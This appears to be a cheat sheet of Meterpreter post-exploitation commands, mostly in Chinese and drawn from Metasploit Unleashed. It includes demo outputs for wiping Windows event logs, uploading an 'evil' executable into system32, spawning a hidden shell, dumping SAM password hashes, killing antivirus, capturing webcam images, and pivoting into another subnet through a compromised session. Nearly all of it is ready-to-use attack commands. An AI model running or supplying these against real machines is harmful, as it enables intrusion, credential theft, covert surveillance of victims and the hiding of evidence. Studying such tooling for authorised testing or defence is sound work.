Meterpreter基础命令

参考：
https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

help

background

把已打开的session放到后台

cat

输出文件文件内容

cd && pwd

clearev

清除Windows上的应用日志，系统日志，和安全日志

Demo

meterpreter > clearev
[*] Wiping 97 records from Application...
[*] Wiping 415 records from System...
[*] Wiping 0 records from Security...

upload

Demo

meterpreter > upload evil_*.exe c:\\windows\\system32
[*] uploading  : evil_*.exe -> c:\windows\system32
[*] uploaded   : evil_*.exe -> c:\windows\system32\evil_*.exe

download

edit

使用vim编辑文本文档

execute

执行可执行文件

Demo

meterpreter > execute -f cmd.exe -i -H
Process 38320 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

hashdump

dump the contents of the SAM database

idletime

display the number of seconds that the user at the remote machine has been idle.

ipconfig <=> ifconfig /all

ps <=> tasklist

search

locate specific files on the target host. The command is capable of searching through the whole system or specific folders.

Demo

meterpreter > search -f autoexec.bat
Found 1 result...
    c:\AUTOEXEC.BAT
meterpreter > search -f sea*.bat c:\\xamp\\
Found 1 result...
    c:\\xampp\perl\bin\search.bat (57035 bytes)

shell

run killav

杀掉杀软

run post/windows/gather/enum_applications

获取安装的软件信息

run post/windows/gather/dumplinks

查看目标机的最近的文件操作

webcam_list

display currently available web cams on the target host.

Demo

meterpreter > webcam_list
1: Creative WebCam NX Pro
2: Creative WebCam NX Pro (VFW)

resource ?

execute Meterpreter instructions located inside a text file. Containing one entry per line, “resource” will execute each line in sequence. This can help automate repetitive actions performed by a user.

By default, the commands will run in the current working directory (on target machine) and resource file in the local working directory (the attacking machine).

webcam_snap

Demo

grabs a picture from a connected web cam on the target system, and saves it to disc as a JPEG image. By default, the save location is the local current working directory with a randomized filename.

得到某个meterperter session之后，将该victim作为进入其所在另一个网络的下一跳，即添加路由。

msf > route help
Route traffic destined to a given subnet through a supplied session.

Usage:
  route [add/remove] subnet netmask [comm/sid]
  route [add/remove] cidr [comm/sid]
  route [get] <host or network>
  route [flush]
  route [print]

Subcommands:
  add - make a new route
  remove - delete a route; 'del' is an alias
  flush - remove all routes
  get - display the route for a given target
  print - show all active routes

Examples:
  Add a route for all hosts from 192.168.0.0 to 192.168.0.0 through session 1
    route add 192.168.0.0 255.255.255.0 1
    route add 192.168.0.0/24 1

  Delete the above route
    route remove 192.168.0.0/24 1
    route del 192.168.0.0 255.255.255.0 1

  Display the route that would be used for the given host or network
    route get 192.168.0.11

先在session中查看路由，

meterpreter > route

查看路由之后，
将得到的session放到background.

meterperter > background

然后添加路由。

meterpreter > route add 10.0.0.0/24 1

即表示所有向10.0.0.0/24的流量都通过session 1转发。

然后可以

use auxiliary/scanner/smb/smb_version

查看一下操作系统版本。
参考：
https://www.youtube.com/watch?v=HDhlP2OjgHU